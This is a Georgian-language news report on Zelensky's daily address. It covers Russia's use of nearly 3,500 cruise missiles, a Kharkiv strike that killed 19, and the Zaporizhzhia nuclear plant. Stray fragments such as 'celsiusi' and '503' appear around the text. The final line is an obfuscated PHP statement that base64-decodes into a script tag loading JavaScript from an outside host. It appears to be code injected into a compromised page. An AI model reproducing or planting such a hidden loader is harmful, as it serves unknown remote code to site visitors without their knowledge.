celsiusi
ავერსი შნაიდერი
რუსეთის მიერ უკრაინის წინააღმდეგ 3,5 ათასი ფრთოსანი რაკეტა იქნა გამოყენებული, – აღნიშნულის შესახებ უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ ყოველდღიურ მიმართვაში განაცხადა.
 
პრეზიდენტმა აღნიშნა, რომ გამართა შეხვედრა თავდაცვისა და უსაფრთხოების სექტორის წარმომადგენლებთან, რომლებთანაც მოწინავე ხაზზე და სხვადასხვა ქალაქში არსებული მდგომარეობა, ასევე მოახლოებულ სადღესასწაულო დღეებში უსაფრთხოების საკითხები განიხილა.
 
ზელენსკიმ განაცხადა, რომ შესაბამისმა სამსახურებმა დაასრულეს ხარკოვში რუსეთის სარაკეტო დარტყმის შედეგად დანგრეული სახლის გაწმენდითი სამუშაოები. მისი თქმით, ამ ერთმა დარტყმამ 19 ადამიანის სიცოცხლე შეიწირა, ხოლო ასეთი დარტყმები უკვე 180 დღეა, არ წყდება.
 
„სხვადასხვა ფრთოსანი რაკეტის საერთო რაოდენობა, რომლებიც რუსეთმა ჩვენს წინააღმდეგ გამოიყენა, უკვე 3,5 ათასს უახლოვდება. რუსული არტილერიის დარტყმების დათვლა უბრალოდ შეუძლებელია – იმდენად ბევრია, იმდენად ინტენსიურია. ამავდროულად, ტერორისტი სახელმწიფო არ წყვეტს თამაშს საერთაშორისო სტრუქტურებთან და კიდევ ერთხელ თავხედურად მოიწვია გაერო-ს უშიშროების საბჭო, რათა განიხილოს საკუთარი პროვოკაციები, საკუთარი ტერორი ზაპოროჟიეს ატომურ ელექტროსადგურზე“, – განაცხადა ზელენსკიმ.
 
 
503
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");